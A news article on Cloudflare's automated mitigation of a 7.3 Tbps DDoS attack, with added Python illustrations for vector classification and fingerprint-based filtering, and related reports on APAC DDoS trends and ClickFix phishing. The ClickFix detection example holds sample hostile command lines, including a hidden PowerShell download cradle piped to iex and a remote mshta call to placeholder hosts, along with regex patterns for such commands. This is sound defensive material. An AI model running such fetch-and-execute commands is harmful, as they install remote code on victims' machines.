Cloudflare thwarts record 7.3 Tbps DDoS attack with automation

Techday NZ, 18 hours ago

Cloudflare has confirmed it recently mitigated what it describes as the largest distributed denial-of-service (DDoS) attack ever publicly disclosed, clocking in at 7.3 terabits per second (Tbps), surpassing previous known records.
The attack, which occurred in mid-May 2025, targeted a hosting provider customer utilising Cloudflare's Magic Transit service for network defence. According to Cloudflare data, this incident follows closely on the heels of attacks recorded at 6.5 Tbps and 4.8 billion packets per second, illustrating that DDoS attacks are continuing to increase in both scale and complexity.
Cloudflare stated that the 7.3 Tbps attack was 12% larger than its previous record and 1 Tbps greater than another recent attack reported by security journalist Brian Krebs.
Attack analysis
The 7.3 Tbps DDoS attack delivered 37.4 terabytes of data in roughly 45 seconds. The single targeted IP address was carpet-bombed across an average of 21,925 destination ports per second, peaking at 34,517, and the source ports of the attack traffic were spread across a similarly wide range.
The attack employed several vectors but was dominated by UDP floods, constituting 99.996% of total traffic. The residual traffic, amounting to 1.3 GB, involved QOTD reflection, Echo reflection, NTP reflection, Mirai UDP floods, Portmap flood, and RIPv1 amplification techniques. Each vector was identified and catalogued, with Cloudflare detailing how organisations could protect both themselves and the broader Internet from such forms of abuse.
Cloudflare explained that the UDP flood component simply sends large volumes of UDP packets to random or specific destination ports, either to saturate the Internet link or to exhaust the packet-processing capacity of network appliances in the path. The QOTD (Quote of the Day), Echo, NTP, Portmap and RIPv1 vectors are reflection and amplification attacks: the attacker sends small requests, with the source address spoofed to the victim's, to publicly reachable hosts still running these legacy services, and those hosts send their replies, often many times larger than the request, to the target. An organisation protects the wider Internet from this abuse by not exposing such services and by filtering packets with spoofed source addresses as they leave its network.
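As an added illustration (not Cloudflare's code or data), the Python below attributes a sample of packet records to the vectors named above and computes the per-second destination-port spread quoted earlier. The packet records are constructed; reflection vectors are recognised by the well-known UDP source port the abused service replies from, and anything else on UDP is counted as a direct flood.

```python
from collections import Counter, defaultdict

# Reflected packets come back from the abused service's well-known UDP port,
# so the *source* port identifies the reflection vector.  Direct floods
# (Mirai-style) use random source ports and fall through to "UDP flood".
REFLECTOR_PORTS = {
    7: "Echo reflection",
    17: "QOTD reflection",
    111: "Portmap flood",
    123: "NTP reflection",
    520: "RIPv1 amplification",
}

# Constructed sample of packets towards one target IP (ts in seconds,
# length = IP total length in bytes).  Not real capture data.
SAMPLES = [
    {"ts": 0.1, "proto": "udp", "sport": 51000, "dport": 80,    "length": 1400},
    {"ts": 0.2, "proto": "udp", "sport": 51001, "dport": 443,   "length": 1400},
    {"ts": 0.3, "proto": "udp", "sport": 51002, "dport": 8080,  "length": 1400},
    {"ts": 0.4, "proto": "udp", "sport": 123,   "dport": 27015, "length": 468},
    {"ts": 0.5, "proto": "udp", "sport": 51003, "dport": 22,    "length": 1400},
    {"ts": 1.1, "proto": "udp", "sport": 51004, "dport": 53,    "length": 1400},
    {"ts": 1.2, "proto": "udp", "sport": 51005, "dport": 80,    "length": 1400},
    {"ts": 1.3, "proto": "udp", "sport": 17,    "dport": 1234,  "length": 100},
    {"ts": 1.4, "proto": "udp", "sport": 7,     "dport": 1234,  "length": 64},
    {"ts": 1.5, "proto": "udp", "sport": 51006, "dport": 3389,  "length": 1400},
    {"ts": 1.6, "proto": "udp", "sport": 51007, "dport": 1234,  "length": 1400},
]


def classify(pkt):
    """Name the attack vector a single packet belongs to."""
    if pkt["proto"] != "udp":
        return "other"
    return REFLECTOR_PORTS.get(pkt["sport"], "UDP flood")


def summarise(samples):
    """Byte share per vector plus the average and peak number of distinct
    destination ports hit per second (the 'carpet bombing' measure)."""
    bytes_by_vector = Counter()
    dports_by_second = defaultdict(set)
    for p in samples:
        bytes_by_vector[classify(p)] += p["length"]
        dports_by_second[int(p["ts"])].add(p["dport"])
    total = sum(bytes_by_vector.values())
    per_second = [len(ports) for ports in dports_by_second.values()]
    return {
        "share": {v: round(b / total, 4) for v, b in bytes_by_vector.items()},
        "avg_dports_per_sec": sum(per_second) / len(per_second),
        "peak_dports_per_sec": max(per_second),
    }


if __name__ == "__main__":
    for vector, share in sorted(summarise(SAMPLES)["share"].items(), key=lambda kv: -kv[1]):
        print(f"{share:8.2%}  {vector}")
```

Run over a real sampled capture, the same aggregation is what lets an operator state "99.996% UDP flood with a small residue of reflection"; the reflection share is tiny in bytes but tells you which service owners should be notified that their hosts are being used as reflectors.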
Global scale
The attack was notable for its global reach. Traffic originated from more than 122,145 source IP addresses across 5,433 autonomous systems in 161 countries. Nearly half of the attack traffic came from Brazil and Vietnam, accounting for around twenty-five percent each. The remainder was largely attributable to sources in Taiwan, China, Indonesia, Ukraine, Ecuador, Thailand, the United States, and Saudi Arabia.
At an autonomous system level, Telefonica Brazil (AS27699) contributed 10.5% of attack traffic, with Viettel Group (AS7552), China Unicom (AS4837), Chunghwa Telecom (AS3462), and China Telecom (AS4134) among the other major sources. The attack saw an average of 26,855 unique source IP addresses per second, peaking at 45,097.
Technical response
Cloudflare used its global anycast network to absorb the flood: every Cloudflare data centre advertises the same IP prefixes, so each packet is routed to the data centre nearest its source and the load is spread across the network instead of converging on a single ingress point. This incident was handled across 477 data centres in 293 locations worldwide, with some locations operating multiple facilities because of the traffic volume.
Detection and mitigation were handled by Cloudflare's automated systems, which operate independently in each data centre. Cloudflare says its network runs every service, including DDoS detection and mitigation, in every data centre, so an attack can be detected and mitigated autonomously wherever its traffic lands.
Within each data centre, packets were spread across the available servers, where they were sampled for analysis by the denial of service daemon (dosd), a heuristic engine that inspects sampled packet headers for anomalies and patterns indicative of attack traffic. From those samples it generated many permutations of fingerprints specific to the attack, searching for the combination of header fields that would block the most attack traffic while matching as little legitimate traffic as possible.
Within data centres, real-time intelligence was shared by servers multicasting fingerprint information, refining mitigation on both a local and global scale. When a fingerprint surpassed predefined thresholds, mitigation rules were compiled and deployed as extended Berkeley Packet Filter (eBPF) programs to block the offending traffic. Once the attack ceased, associated rules were removed automatically.
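As an added, deliberately simplified model of the fingerprinting loop described above (not Cloudflare's dosd code; the sample packets, field list and thresholds are constructed assumptions), the Python below enumerates candidate fingerprints over subsets of header fields, scores each by attack coverage against collateral damage on a legitimate-traffic sample, deploys the winners greedily once they exceed a share threshold, renders each as a classic pcap-filter expression in place of the eBPF program dosd would compile, and withdraws rules that no longer match anything once the attack stops.

```python
from itertools import combinations

# Header fields a fingerprint may pin down, most discriminating first; the
# order also breaks ties, so earlier field combinations win.
FIELDS = ("sport", "dport", "length", "ttl", "proto")

# Constructed samples (not real capture data).  ATTACK is an NTP reflection
# wave (fixed source port 123, fixed reply size) plus a direct UDP flood from
# random source ports; LEGIT is the target's normal traffic, which any
# fingerprint must leave alone.
ATTACK = [
    {"proto": "udp", "sport": 123, "dport": d, "length": 468, "ttl": 54}
    for d in (80, 443, 8080, 27015, 5060, 111)
] + [
    {"proto": "udp", "sport": s, "dport": 27015, "length": 1400, "ttl": 241}
    for s in (40001, 40002, 40003)
]
LEGIT = [
    {"proto": "udp", "sport": 123,   "dport": 123,   "length": 76,   "ttl": 54},   # genuine NTP reply
    {"proto": "udp", "sport": 53,    "dport": 33000, "length": 120,  "ttl": 58},   # DNS reply
    {"proto": "udp", "sport": 443,   "dport": 52000, "length": 468,  "ttl": 60},   # QUIC, same size as the NTP reply
    {"proto": "tcp", "sport": 443,   "dport": 51000, "length": 1400, "ttl": 54},   # HTTPS segment
    {"proto": "udp", "sport": 27015, "dport": 27015, "length": 60,   "ttl": 241},  # game-server heartbeat
]


def matches(fp, pkt):
    """A fingerprint is a dict of field -> required value."""
    return all(pkt.get(f) == v for f, v in fp.items())


def best_fingerprint(attack, legit, max_fields=3, max_collateral=0.0):
    """Try every value combination of up to max_fields header fields seen in
    the attack sample; return (fingerprint, coverage, collateral) for the one
    covering the most attack packets while matching no more than
    max_collateral of the legitimate sample, or None if nothing qualifies."""
    best = None
    for k in range(1, max_fields + 1):
        for fields in combinations(FIELDS, k):
            seen = {tuple(p[f] for f in fields) for p in attack}
            for values in sorted(seen, key=str):
                fp = dict(zip(fields, values))
                coverage = sum(matches(fp, p) for p in attack) / len(attack)
                collateral = sum(matches(fp, p) for p in legit) / len(legit)
                if collateral > max_collateral:
                    continue
                rank = (coverage, -collateral, -k)   # more coverage, less damage, fewer fields
                if best is None or rank > best[0]:
                    best = (rank, fp, coverage, collateral)
    return None if best is None else best[1:]


def build_ruleset(attack, legit, min_share=0.2, **kwargs):
    """Greedy loop: deploy the best fingerprint, drop the packets it covers,
    repeat.  A candidate is only deployed once it accounts for at least
    min_share of the whole attack sample (the deployment threshold)."""
    remaining, rules = list(attack), []
    while remaining:
        found = best_fingerprint(remaining, legit, **kwargs)
        if found is None:
            break
        fp, coverage, collateral = found
        share = coverage * len(remaining) / len(attack)
        if share < min_share:
            break
        rules.append({"fingerprint": fp, "share": round(share, 3), "collateral": collateral})
        remaining = [p for p in remaining if not matches(fp, p)]
    return rules


def compile_filter(fp):
    """Render a fingerprint as a classic pcap-filter expression, standing in
    for the eBPF program that would be compiled and loaded at the edge."""
    render = {
        "proto": lambda v: v,
        "sport": lambda v: f"src port {v}",
        "dport": lambda v: f"dst port {v}",
        "length": lambda v: f"ip[2:2] = {v}",   # IPv4 total length
        "ttl": lambda v: f"ip[8] = {v}",        # IPv4 TTL
    }
    return " and ".join(render[f](v) for f, v in fp.items())


def expire_idle(rules, recent):
    """Withdraw rules whose fingerprint matches nothing in the latest sample
    window, i.e. the attack they were built for has stopped."""
    return [r for r in rules if any(matches(r["fingerprint"], p) for p in recent)]


if __name__ == "__main__":
    rules = build_ruleset(ATTACK, LEGIT)
    for r in rules:
        print(f"{r['share']:.1%} of attack, {r['collateral']:.0%} collateral: "
              f"{compile_filter(r['fingerprint'])}")
    print("after the attack stops:", expire_idle(rules, LEGIT))
```

With these samples the search settles on two rules: `src port 123 and ip[2:2] = 468` for the reflection wave (source port alone would also drop the target's genuine NTP replies, which is why the packet length is added) and `dst port 27015 and ip[2:2] = 1400` for the direct flood. Note that the per-source-port singletons of the random-port flood never reach the share threshold, which is exactly the trap a naive "block what you see" rule generator falls into.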
Botnet feed and future mitigation
Cloudflare also maintains a free DDoS Botnet Threat Feed to help Internet service providers and hosting companies identify malicious traffic originating within their own infrastructure. The company said that over 600 organisations have subscribed to this service, allowing them to receive up-to-date lists of offending IP addresses engaged in DDoS attacks.
Recommendations from Cloudflare emphasise tailored defences to address the unique characteristics of each network or application, with care taken to ensure that mitigation steps do not inadvertently disrupt legitimate traffic, particularly for services that depend on UDP or legacy protocols.
Cloudflare's team highlighted that these successful defences occurred entirely without human intervention, alerting, or incident escalation, underscoring the shift towards fully autonomous, distributed mitigation strategies in response to modern DDoS threats.


Related Articles


APAC financial sector faces 245% surge in DDoS attacks, report finds
Techday NZ, 11-06-2025

Financial institutions in the Asia-Pacific (APAC) region saw a 245% rise in volumetric Layer 3 and 4 distributed denial-of-service (DDoS) attacks last year, accounting for 38% of such incidents globally, according to a new joint report by FS-ISAC and Akamai. The report, titled From Nuisance to Strategic Threat: DDoS Attacks Against the Financial Sector, outlines the growing scale and persistence of DDoS attacks targeting APAC's financial sector. In 2023, APAC accounted for only 11% of these incidents, highlighting the extent of the increase.

The analysis found that over 20 financial institutions across six countries were affected by sustained DDoS campaigns in the fourth quarter of 2024, creating downstream risk that could impact up to USD $8 trillion in value. These attacks were notable not for their size, but for their persistence and continuity, a trend not previously seen in APAC. The wave of attacks impacted multiple sectors, including retail banking, payment processing, investment banking, and financial governmental institutions.

The report attributes a significant growth in application-level (Layer 7) attacks to the increasing use of application programming interfaces (APIs) within financial services. This expansion of digital infrastructure has introduced new vulnerabilities and a broader attack surface for malicious actors.

FS-ISAC's Chief Intelligence Officer and Managing Director, EMEA, Teresa Walsh, commented on the changing character of DDoS threats: "DDoS attacks are becoming increasingly sophisticated, evolving from simple network flooding to targeted, multi-dimensional assaults that exploit intricate vulnerabilities across the entire supply chain. As threat tactics continue to evolve — including those impacting APAC's increasingly digital financial systems — we must ensure our technical defenses evolve and our people, tools, and processes work seamlessly together. It is critical that we harden our infrastructure and foster a culture of continuous vigilance and collaboration to protect continuity and customer trust."

Reuben Koh, Director of Security Technology & Strategy, APJ at Akamai, highlighted the changing nature of DDoS campaigns in the region: "DDoS attacks in APAC are no longer blunt-force attempts, but sophisticated multi-vector campaigns that exploit vulnerable systems and exposed APIs. As highly coveted target sectors like financial services, commerce, and manufacturing accelerate digital growth, these continuous attacks pose growing operational and reputational risks, and organizations must work with trusted cybersecurity partners who can provide the intelligence, scalability, and agility needed to defend themselves in today's threat landscape."

The joint report also connects the increase in attacks to broader developments, including ongoing geopolitical tensions such as the Israel-Hamas and Russia-Ukraine conflicts. These events have led to a noted rise in ideologically driven hacktivism and blurred the lines between DDoS-for-Hire groups, hacktivists, and state-sponsored actors. The proliferation of DDoS-for-Hire platforms has made these attack tools accessible to a wider range of threat actors.

Globally, the financial sector remained the most targeted industry segment for Layer 3 and 4 DDoS attacks, making up 37% of incidents. This marks the second consecutive year that financial services have led in reported attack numbers, followed by gaming at 20% and manufacturing at 17%. No other sector experienced a similar surge, according to the report's findings.

The publication discusses strategies for improving defences through the FS-ISAC and Akamai-developed DDoS Maturity Model. This framework provides a benchmark for readiness and recommends targeted investment in defence strategies for organisations managing financial infrastructure and sensitive data. The DDoS Maturity Model highlights several key actions for financial institutions and related entities:

  • Adopt real-time behavioural analytics and traffic baselining
  • Implement threat intelligence-led automation for detection and mitigation
  • Strengthen DNS and API security with continuous testing and hardening
  • Use geo-IP filtering to reduce exposure from high-risk regions

The report also contains regional data, profiles of hacktivist groups, and an overview of mitigation strategies and best cyber hygiene practices. It notes the importance of mapping organisational capabilities and practices against different stages of maturity in DDoS defence, offering a structured approach to managing a rising strategic threat. Akamai's collaboration with FS-ISAC on this research builds on the company's involvement in FS-ISAC's Critical Providers Program, which was launched to strengthen supply chain security within the financial sector.

ClickFix phishing surge spoofs Booking.com to target hotels
Techday NZ, 09-06-2025

Research from Cofense Intelligence has identified a series of phishing campaigns targeting hotel chains in the accommodation and food services sector. The campaigns have been running since November 2024, with a sharp increase in March 2025, which alone accounted for 47% of total campaign volume.

The phishing emails impersonate Booking.com and direct recipients to a fake CAPTCHA website that prompts them to run a malicious script. This delivery method, known as a ClickFix attack, is designed to convince users to execute scripts which install remote access trojans (RATs) or information-stealing malware.

ClickFix attacks are distinguished by fake CAPTCHA screens that convincingly mimic brands such as Booking.com and Cloudflare. When users interact with the fake verification, they are instructed to carry out steps, such as pressing Windows keyboard shortcuts, that cause them to run a malicious script without realising it. The script is commonly placed on the user's clipboard by the fraudulent site, typically when a specific button is clicked, and the user is then told to paste it into the Windows Run command prompt and execute it. Sometimes the scripts are obfuscated to look like verification codes, making it less likely that the user will recognise them as harmful. The scripts are typically delivered as PowerShell commands or Microsoft HTML applications which, once executed, can install RATs or steal data from victim devices.

Cofense Intelligence's key findings:

  • 75% of all active threat reports (ATRs) with fake CAPTCHAs used Booking.com-spoofing ClickFix templates. Other, rarer ClickFix templates spoof Cloudflare Turnstile CAPTCHAs or are styled as cookie consent banners.
  • 64% of campaign ATRs delivered RATs, 47% delivered information stealers, and 11% delivered both.
  • XWorm RAT is the most common RAT, present in 53% of campaign ATRs.
  • Pure Logs Stealer (19% of ATRs) and DanaBot (14% of ATRs) are the most common information stealers.

The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages featured generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and incorporate references to specific guest reservations, tactics designed to elicit a response and drive the recipient to interact with malicious links. Some emails state that the link will only function on Windows, and recipients who access the site on other operating systems receive a message indicating this limitation. In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.
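As an added example of spotting the ClickFix execution step in endpoint telemetry (not Cofense's code; the process events below are constructed in the style of Sysmon Event ID 1, and the hostnames use the reserved .invalid domain), the Python scores process-creation events on two traces the technique leaves behind: a script host spawned by explorer.exe, which is what running a pasted command from the Win+R dialog looks like, and command-line markers such as a hidden window, a download cradle piped into Invoke-Expression, a remote mshta target, or a trailing comment carrying the "I am not a robot" decoy text the user was told to paste.

```python
import re

# Constructed process-creation events in the style of Sysmon Event ID 1.
# Not real telemetry; hostnames use the reserved .invalid TLD.
EVENTS = [
    {   # ClickFix: user pasted the clipboard payload into Win+R
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell -w hidden -c "iex (iwr -useb http://captcha-check.example.invalid/v.txt)" '
                   '# I am not a robot - reCAPTCHA Verification ID: 8315',
    },
    {   # ClickFix variant launching an HTML application from the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "cmdline": "mshta https://guest-review.example.invalid/verify.hta # Verification",
    },
    {   # Benign: scheduled maintenance script
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # Benign: a user typing a harmless command into Win+R
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": "cmd /c ipconfig /all",
    },
    {   # Suspicious but not ClickFix: macro-spawned encoded PowerShell
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line markers typical of the pasted ClickFix payload.
INDICATORS = [
    ("hidden_window",     re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("encoded_command",   re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle",   re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("mshta_remote",      re.compile(r"mshta(?:\.exe)?\s+\"?https?://", re.I)),
    # The lure appends a comment so the pasted text looks like a verification step.
    ("captcha_decoy",     re.compile(r"#.*(?:not a robot|verif|captcha)", re.I)),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Score one event: +1 per command-line indicator, +2 when a script host is
    started by explorer.exe (the Run dialog / double-click parentage)."""
    hits = [name for name, rx in INDICATORS if rx.search(ev["cmdline"])]
    from_run_dialog = (basename(ev["parent"]) == "explorer.exe"
                       and basename(ev["image"]) in SCRIPT_HOSTS)
    return {"from_run_dialog": from_run_dialog,
            "indicators": hits,
            "score": len(hits) + (2 if from_run_dialog else 0)}


def detect(events, threshold=3):
    """Return (index, verdict) for events at or above the alert threshold."""
    alerts = []
    for i, ev in enumerate(events):
        verdict = score_event(ev)
        if verdict["score"] >= threshold:
            alerts.append((i, verdict))
    return alerts


if __name__ == "__main__":
    for i, verdict in detect(EVENTS):
        print(f"event {i}: score {verdict['score']} {verdict['indicators']}")
```

The parent-process weighting is what separates the two ClickFix events from the last one: the macro-spawned encoded PowerShell scores on its command line alone but stays below the threshold here, because it belongs to a different phishing chain and should be caught by a rule keyed on Office parents rather than on the Run dialog. The harmless `ipconfig` typed into Win+R shows that parentage on its own is not enough either.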
